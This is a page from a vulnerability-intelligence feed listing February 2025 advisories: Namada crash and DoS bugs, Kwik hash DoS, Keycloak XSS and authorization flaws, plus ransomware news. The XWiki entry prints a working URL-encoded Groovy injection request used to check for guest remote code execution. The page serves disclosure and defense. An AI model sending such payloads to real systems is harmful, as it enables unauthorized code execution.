CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!

Threat and Vulnerability Intelligence Database

RSS Feed

Example Searches:

CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
[namada-apps] Namada-apps allows Post-Genesis Validator Bypass
Description: Impact Ledger crash. A user is able to initialize a post-genesis validator with a negative commission rate using the --force flag. If this validator gets into the consensus set, then when computing PoS inflation inside fn update_rewards_products_and_mint_inflation, an instance of mul_floor will cause the return of an Err, which causes finalize_block to error. Patches This issue has been patched in apps version 1.1.0. The PoS validity predicate now enforces that the commission rate is not negative and any transaction that fails the check will be rejected, both for newly initialized validators and for commission rate change of an existing validator. Workarounds There are no workarounds and users are advised to upgrade. References https://github.com/anoma/namada/security/advisories/GHSA-2gw2-qgjg-xh6p https://github.com/advisories/GHSA-2gw2-qgjg-xh6p
Source: Github Advisory Database (Rust)
February 20th, 2025 (5 months ago)
[namada-apps] Namada-apps can Crash with Excessive Computation in Mempool Validation
Description: Impact A malicious transaction may cause a crash in mempool validation. A transaction with authorization section containing 256 public keys or more with valid matching signatures triggers an integer overflow in signature verification that causes a the node to panic. Patches This issue has been patched in apps version 1.1.0. The mempool validation has been fixed to avoid overflow. Workarounds There are no workarounds and users are advised to upgrade. References https://github.com/anoma/namada/security/advisories/GHSA-82vg-5v4f-f9wq https://github.com/advisories/GHSA-82vg-5v4f-f9wq
Source: Github Advisory Database (Rust)
February 20th, 2025 (5 months ago)
[namada-apps] Namada-apps allows Excessive Computation in Mempool Validation
Description: Impact A malicious transaction may cause an expensive computation in mempool validation. A transaction with multiple repeated sections causes the section hash calculation used for signature validation to grow exponentially (and potentially even cubic) in proportion to number of sections. This may be used to significantly slow down operation of nodes. Patches This issue has been patched in apps version 1.1.0. The transaction sections are now being checked for uniqueness and the number of permitted sections contained in a single transaction has been limited to 10,000. Workarounds There are no workarounds and users are advised to upgrade. References https://github.com/anoma/namada/security/advisories/GHSA-f8qm-hmm3-fv7f https://github.com/advisories/GHSA-f8qm-hmm3-fv7f
Source: Github Advisory Database (Rust)
February 20th, 2025 (5 months ago)
[org.xwiki.platform:xwiki-platform-search-solr-ui] XWiki Platform allows remote code execution as guest via SolrSearchMacros request
Description: Impact Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20. If there is an output, and the title of the RSS feed contains Hello from search text:42, then the instance is vulnerable. Patches This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Workarounds This line in Main.SolrSearchMacros can be edited to match the rawResponse macro defined here with a content type of application/xml, instead of simply outputting the content of the feed. References https://jira.xwiki.org/browse/XWIKI-22149 https://github.com/xwiki/xwiki-platform/commit/67021db9b8ed26c2236a653269302a86bf01ef40 Attribution This vulnerability has been reported by John Kwak for Trend Micro's Zero Day Initiative. References https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j https://github.com/xwiki/xwiki-platform/commit/67021db9b8ed26c2236a653269302a86bf01ef40 https://github.com/xwiki/xwiki-platform/blob/568447cad5172d97d6bbcfda9f6183689c2cf086/xwiki-platform-core/xwiki-platform-search/xwiki-platform-search-solr/xwiki-platform-search-solr-...
Source: Github Advisory Database (Maven)
February 20th, 2025 (5 months ago)

CVE-2025-23020
[tech.kwik:kwik] Kwik hash collision vulnerability
Description: An issue was discovered in Kwik before 0.10.1. A hash collision vulnerability (in the hash table used to manage connections) allows remote attackers to cause a considerable CPU load on the server (a Hash DoS attack) by initiating connections with colliding Source Connection IDs (SCIDs). References https://nvd.nist.gov/vuln/detail/CVE-2025-23020 https://github.com/ncc-pbottine/QUIC-Hash-Dos-Advisory https://github.com/ptrd/kwik/releases/tag/v0.10.1 https://github.com/ptrd/kwik/commit/b0733d72bad76bc5d8df2f4a7792ebb2539ebdc8 https://github.com/advisories/GHSA-9f57-9rhg-4hvm

CVSS: MEDIUM (5.3)

EPSS Score: 0.12%

Source: Github Advisory Database (Maven)
February 20th, 2025 (5 months ago)

CVE-2024-4028
[org.keycloak:keycloak-core] Keycloak allows cross-site scripting (XSS)
Description: A vulnerability was found in Keycloak. This issue may allow a privileged attacker to use a malicious payload as the permission while creating items (Resource and Permissions) from the admin console, leading to a stored cross-site scripting (XSS) attack. References https://nvd.nist.gov/vuln/detail/CVE-2024-4028 https://access.redhat.com/security/cve/CVE-2024-4028 https://bugzilla.redhat.com/show_bug.cgi?id=2276418 https://github.com/advisories/GHSA-q4xq-445g-g6ch

EPSS Score: 0.04%

Source: Github Advisory Database (Maven)
February 20th, 2025 (5 months ago)

CVE-2025-1391
[org.keycloak:keycloak-services] Keycloak allows Incorrect Assignment of an Organization to a User
Description: A flaw was found in the Keycloak organization feature, which allows the incorrect assignment of an organization to a user if their username or email matches the organization’s domain pattern. This issue occurs at the mapper level, leading to misrepresentation in tokens. If an application relies on these claims for authorization, it may incorrectly assume a user belongs to an organization they are not a member of, potentially granting unauthorized access or privileges. References https://nvd.nist.gov/vuln/detail/CVE-2025-1391 https://access.redhat.com/security/cve/CVE-2025-1391 https://bugzilla.redhat.com/show_bug.cgi?id=2346082 https://github.com/keycloak/keycloak/commit/5aa2b4c75bb474303ab807017582bc01a9f7e378 https://github.com/advisories/GHSA-rq4w-cjrr-h8w8

EPSS Score: 0.03%

Source: Github Advisory Database (Maven)
February 20th, 2025 (5 months ago)
Black Basta ransomware gang's internal chat logs leak online
Description: An unknown leaker has released what they claim to be an archive of internal Matrix chat logs belonging to the Black Basta ransomware operation. [...]
Source: BleepingComputer
February 20th, 2025 (5 months ago)
Ghost Ransomware Targets Orgs in 70+ Countries
Description: The China-backed threat group often acts swiftly, going from initial access to compromise in just one day, a behavior atypical of cybercriminal groups.
Source: Dark Reading
February 20th, 2025 (5 months ago)
Efficiency? Security? When the quest for one grants neither.
Description: William discusses what happens when security is an afterthought rather than baked into processes and highlights the latest of Talos' security research.
Source: Cisco Talos Blog
February 20th, 2025 (5 months ago)